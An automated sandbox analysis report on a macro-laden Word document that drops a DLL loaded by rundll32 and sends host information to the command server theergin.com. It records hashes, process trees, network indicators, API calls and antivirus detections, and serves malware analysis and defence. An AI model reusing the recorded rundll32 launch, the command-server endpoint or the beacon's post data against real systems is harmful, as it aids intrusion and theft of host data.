Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6403_us	Sept. 24, 2021, 12:02 p.m.	Sept. 24, 2021, 12:04 p.m.

Size	356.0KB
Type	Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Template: Normal.dotm, Revision Number: 2, Create Time/Date: Thu Sep 23 08:07:00 2021, Last Saved Time/Date: Thu Sep 23 08:07:00 2021, Number of Pages: 1, Number of Words: 3, Number of Characters: 19, Security: 0
MD5	`e8e1dde40267664d096d602fcf1fb785`
SHA256	`66b268acec79cfc0e2c6aa21dbd2e6c7c4c694817ba915eeda716ba06eb37b94`
CRC32	`C7018732`
ssdeep	`6144:PKVCgeFRmJMYjTkRFr8NWkBUO6It5uZtvxoGit6ljMY1q1slFoIHYobsuyvu7385:SV9iQsDr8NZUOJOtv7i8ljMYukFoobeo`
Yara	Contains_VBA_macro_code - Detect a MS Office document with embedded VBA macro code [binaries] Generic_Malware_Zero - Generic Malware Microsoft_Office_File_Zero - Microsoft Office File

WINWORD.EXE "C:\Program Files (x86)\Microsoft Office\Office15\WINWORD.EXE" C:\Users\test22\AppData\Local\Temp\0923_690278402563.doc
2608
- rundll32.exe rundll32.exe c:\users\test22\appdata\roaming\microsoft\templates\flexx.xz,LYLWQWYCUVI
  352

Name	Response	Post-Analysis Lookup
theergin.com	A 91.214.71.26	91.214.71.26
api.ipify.org	A 54.243.29.214 A 23.21.76.7 CNAME nagano-19599.herokussl.com A 50.16.244.183 A 50.19.227.64 A 23.23.137.115 A 50.16.216.118 A 54.243.51.135 CNAME elb097307-934924932.us-east-1.elb.amazonaws.com A 23.21.173.155	23.21.173.155

IP Address	Status	Action
164.124.101.2	Active	Moloch
50.16.216.118	Active	Moloch
91.214.71.26	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.103:49175 -> 50.16.216.118:80	2021997	ET POLICY External IP Lookup api.ipify.org	Device Retrieving External IP Address Detected

Suricata TLS

No Suricata TLS

Queries for the computername (1 event)

Time & API	Arguments	Status	Return	Repeated
GetComputerNameA Sept. 24, 2021, 12:02 p.m.	computer_name: TEST22-PC	1	1	0

Checks if process is being debugged by a debugger (1 event)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Sept. 24, 2021, 12:02 p.m.			0	0

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

HTTP traffic contains suspicious features which may be indicative of malware related traffic (1 event)

suspicious_features

POST method with no referer header

suspicious_request

POST http://theergin.com/8/forum.php

Performs some HTTP requests (2 events)

request	GET http://api.ipify.org/
request	POST http://theergin.com/8/forum.php

Sends data using the HTTP POST Method (1 event)

request

POST http://theergin.com/8/forum.php

Allocates read-write-execute memory (usually to unpack itself) (50 out of 101 events)

Time & API	Arguments	Status
NtProtectVirtualMemory Sept. 24, 2021, 12:02 p.m.	process_identifier: 2608 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6a85d000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 24, 2021, 12:02 p.m.	process_identifier: 2608 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6a46e000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 24, 2021, 12:02 p.m.	process_identifier: 2608 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04667000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 24, 2021, 12:02 p.m.	process_identifier: 2608 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04667000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 24, 2021, 12:02 p.m.	process_identifier: 2608 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04667000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 24, 2021, 12:02 p.m.	process_identifier: 2608 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04667000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 24, 2021, 12:02 p.m.	process_identifier: 2608 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04667000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 24, 2021, 12:02 p.m.	process_identifier: 2608 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04667000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 24, 2021, 12:02 p.m.	process_identifier: 2608 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04bb9000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 24, 2021, 12:02 p.m.	process_identifier: 2608 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04bb9000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 24, 2021, 12:02 p.m.	process_identifier: 2608 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04bb9000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 24, 2021, 12:02 p.m.	process_identifier: 2608 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04bb9000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 24, 2021, 12:02 p.m.	process_identifier: 2608 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04bb9000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 24, 2021, 12:02 p.m.	process_identifier: 2608 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04bb9000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 24, 2021, 12:02 p.m.	process_identifier: 2608 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04bb9000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 24, 2021, 12:02 p.m.	process_identifier: 2608 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04bb9000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 24, 2021, 12:02 p.m.	process_identifier: 2608 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04bba000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 24, 2021, 12:02 p.m.	process_identifier: 2608 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04bb9000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 24, 2021, 12:02 p.m.	process_identifier: 2608 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04bb9000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 24, 2021, 12:02 p.m.	process_identifier: 2608 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04bb9000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 24, 2021, 12:02 p.m.	process_identifier: 2608 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04bb9000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 24, 2021, 12:02 p.m.	process_identifier: 2608 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04bb9000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 24, 2021, 12:02 p.m.	process_identifier: 2608 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04bb9000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 24, 2021, 12:02 p.m.	process_identifier: 2608 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04bb9000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 24, 2021, 12:02 p.m.	process_identifier: 2608 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04bb9000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 24, 2021, 12:02 p.m.	process_identifier: 2608 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04667000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 24, 2021, 12:02 p.m.	process_identifier: 2608 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04667000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 24, 2021, 12:02 p.m.	process_identifier: 2608 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04667000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 24, 2021, 12:02 p.m.	process_identifier: 2608 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04bb9000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 24, 2021, 12:02 p.m.	process_identifier: 2608 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04bb9000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 24, 2021, 12:02 p.m.	process_identifier: 2608 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04bb9000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 24, 2021, 12:02 p.m.	process_identifier: 2608 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04bb9000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 24, 2021, 12:02 p.m.	process_identifier: 2608 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04667000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 24, 2021, 12:02 p.m.	process_identifier: 2608 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04667000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 24, 2021, 12:02 p.m.	process_identifier: 2608 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04667000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 24, 2021, 12:02 p.m.	process_identifier: 2608 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04bb9000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 24, 2021, 12:02 p.m.	process_identifier: 2608 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04bb9000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 24, 2021, 12:02 p.m.	process_identifier: 2608 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04bb9000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 24, 2021, 12:02 p.m.	process_identifier: 2608 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04bb9000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 24, 2021, 12:02 p.m.	process_identifier: 2608 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04bb9000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 24, 2021, 12:02 p.m.	process_identifier: 2608 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04bb9000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 24, 2021, 12:02 p.m.	process_identifier: 2608 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04bb9000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 24, 2021, 12:02 p.m.	process_identifier: 2608 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04bb9000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 24, 2021, 12:02 p.m.	process_identifier: 2608 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04bb9000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 24, 2021, 12:02 p.m.	process_identifier: 2608 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04bb9000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 24, 2021, 12:02 p.m.	process_identifier: 2608 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04bb9000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 24, 2021, 12:02 p.m.	process_identifier: 2608 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04bb9000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 24, 2021, 12:02 p.m.	process_identifier: 2608 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04bb9000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 24, 2021, 12:02 p.m.	process_identifier: 2608 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04bb9000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 24, 2021, 12:02 p.m.	process_identifier: 2608 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04bb9000 process_handle: 0xffffffff	1

Looks up the external IP address (1 event)

domain

api.ipify.org

Creates (office) documents on the filesystem (2 events)

file	C:\Users\test22\AppData\Local\Temp\~$23_690278402563.doc
file	c:\Users\test22\AppData\Roaming\microsoft\templates\~$diplo.doc

Creates executable files on the filesystem (1 event)

file	C:\Users\test22\AppData\Roaming\Microsoft\Office\Recent\diplo.doc.LNK

Creates hidden or system file (2 events)

Time & API	Arguments	Status	Return	Repeated
NtCreateFile Sept. 24, 2021, 12:02 p.m.	create_disposition: 5 (FILE_OVERWRITE_IF) file_handle: 0x000004a0 filepath: C:\Users\test22\AppData\Local\Temp\~$23_690278402563.doc desired_access: 0x40100080 (FILE_READ_ATTRIBUTES\|SYNCHRONIZE\|GENERIC_WRITE) file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN) filepath_r: \??\C:\Users\test22\AppData\Local\Temp\~$23_690278402563.doc create_options: 4194400 (FILE_NON_DIRECTORY_FILE\|FILE_SYNCHRONOUS_IO_NONALERT) status_info: 2 (FILE_CREATED) share_access: 0 ()	1	0	0
NtCreateFile Sept. 24, 2021, 12:02 p.m.	create_disposition: 5 (FILE_OVERWRITE_IF) file_handle: 0x00000668 filepath: c:\Users\test22\AppData\Roaming\microsoft\templates\~$diplo.doc desired_access: 0x40100080 (FILE_READ_ATTRIBUTES\|SYNCHRONIZE\|GENERIC_WRITE) file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN) filepath_r: \??\c:\users\test22\appdata\roaming\microsoft\templates\~$diplo.doc create_options: 4194400 (FILE_NON_DIRECTORY_FILE\|FILE_SYNCHRONOUS_IO_NONALERT) status_info: 2 (FILE_CREATED) share_access: 0 ()	1	0	0

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Roaming\Microsoft\Office\Recent\diplo.doc.LNK

Word document hooks document open

Changes read-write memory protection to read-execute (probably to avoid detection when setting all RWX flags at the same time) (1 event)

Time & API	Arguments	Status	Return	Repeated
NtProtectVirtualMemory Sept. 24, 2021, 12:02 p.m.	process_identifier: 2608 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 32 (PAGE_EXECUTE_READ) base_address: 0x7ef70000 process_handle: 0xffffffff	1	0	0

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses Sept. 24, 2021, 12:02 p.m.	flags: 0 family: 2	1	0	0

File has been identified by 16 AntiVirus engines on VirusTotal as malicious (16 events)

ALYac	VB:Trojan.Valyria.5322
VIPRE	LooksLike.Macro.Malware.k (v)
Arcabit	VB:Trojan.Valyria.D14CA
ESET-NOD32	a variant of VBA/TrojanDropper.Agent.CEY
Avast	Script:SNH-gen [Trj]
Kaspersky	HEUR:Trojan-Dropper.Script.Generic
BitDefender	VB:Trojan.Valyria.5322
MicroWorld-eScan	VB:Trojan.Valyria.5322
Ad-Aware	VB:Trojan.Valyria.5322
Emsisoft	VB:Trojan.Valyria.5322 (B)
McAfee-GW-Edition	Artemis!Trojan
FireEye	VB:Trojan.Valyria.5322
MAX	malware (ai score=89)
GData	VB:Trojan.Valyria.5322
SentinelOne	Static AI - Suspicious OLE
AVG	Script:SNH-gen [Trj]

One or more non-whitelisted processes were created (1 event)

parent_process

winword.exe

martian_process

rundll32.exe c:\users\test22\appdata\roaming\microsoft\templates\flexx.xz,LYLWQWYCUVI

A process performed obfuscation on information about the computer or sent it to a remote location indicative of CnC Traffic/Preperations. (1 event)

Time & API	Arguments	Status	Return	Repeated
HttpSendRequestA Sept. 24, 2021, 12:02 p.m.	headers: Content-Type: application/x-www-form-urlencoded request_handle: 0x00cc000c post_data: GUID=8962251904648732308&BUILD=2309_dpsom&INFO=TEST22-PC @ test22-PC\test22&EXT=&IP=175.208.134.150&TYPE=1&WIN=6.1(x64)	1	1	0

The process winword.exe wrote an executable file to disk (1 event)

file	C:\Users\test22\AppData\Local\Temp\flex.xz

Generates some ICMP traffic

0923_690278402563.doc

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All